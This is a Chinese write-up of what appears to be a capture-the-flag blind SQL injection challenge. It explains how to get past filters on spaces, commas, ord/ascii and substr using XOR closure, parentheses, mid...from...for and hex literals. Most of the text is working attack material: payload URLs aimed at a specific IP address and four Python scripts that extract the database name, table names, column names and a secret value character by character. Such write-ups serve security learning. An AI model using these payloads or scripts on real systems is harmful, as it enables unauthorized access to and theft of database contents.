平安科技的一道sql注入

考点

异或闭合 '^1^'，两空字符异或是0，0和1异或结果是1

空格，%0b被过滤，用()绕过，绕的时候很容易眼花

ord、ascii、substr被过滤，而且没法用空格或者/**/绕过
mid没被过滤，可以用mid查询字母对比，但是mysql数据库是不分大小写，所以查询结果无法区分大小写

逗号被过滤
limit 0,1用limit 1 offset 0代替、
substr(字符串，2，1) 用 substr（字符串 from 2 for 1）代替、

但是这里学到了一个姿势，可以不用limit
select group_concat(distinct(table_name)) 可以查多个表名列名

用 where(table_schema)in(0x776562))的形式来代替 where table_schema='web'

用 in(0x十六进制) 的形式来代替 ='a'

凡是库表列名都用十六进制表示

这里给出四句关键的payload

http://54.222.188.152:25718/index.php?id='^(mid(database()from(0)for(1))in(0x61))^'

http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(0)for(1))in(0x61))^'

http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(0)for(1))in(0x61))^'

http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(secret)))from(web.message))from(0)for(1))in(0x61))^'

Paste_Image.png Paste_Image.png

database.py

import requests
url="http://54.222.188.152:25718/index.php?id="
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
result=''
for i in range(0,10):
    i =str(i)
    for j in chars:
        j=hex(ord(j))
        payload = "'^(mid(database()from(%s)for(1))in(%s))^'"%(i,j)
#       print url+payload
        r=requests.get(url+payload)
#       print r.text
        if 'Hello' in r.text:
            result +=chr(int(j,16))
            print result

table.py

import requests
url="http://54.222.188.152:25718/index.php?id="
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
result=''
for i in range(0,50):
    i =str(i)
    for j in chars:
        j=hex(ord(j))
        payload = "'^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(%s)for(1))in(%s))^'"%(i,j)
#       print url+payload
        r=requests.get(url+payload)
#       print r.text
        if 'Hello' in r.text:
            result +=chr(int(j,16))
            print result

column.py

import requests
url="http://54.222.188.152:25718/index.php?id="
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
result=''
for i in range(0,50):
    i =str(i)
    for j in chars:
        j=hex(ord(j))
        payload = "'^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(%s)for(1))in(%s))^'"%(i,j)
#       print url+payload
        r=requests.get(url+payload)
#       print r.text
        if 'Hello' in r.text:
            result += chr(int(j,16))
            print result             

dump.py

#!coding:utf-8
import requests
url="http://54.222.188.152:25718/index.php?id="
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],. ' #这里缩小了字符集合
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
#mysql数据库是不分大小写的，这里由于ord和ascii都被过滤了,所以只能用in查询字母对比，所以是无法区分大小写，大小写查询都对
result=''

for i in range(0,100):
    i =str(i)
    for j in chars:
        j=hex(ord(j))
        payload = "'^(mid((select(group_concat(distinct(secret)))from(web.message))from(%s)for(1))in(%s))^'"%(i,j)
#       print url+payload
        r=requests.get(url+payload)
#       print r.text
        if 'Hello' in r.text:
            result += chr(int(j,16))
            print result

Paste_Image.png Paste_Image.png Paste_Image.png Paste_Image.png Paste_Image.png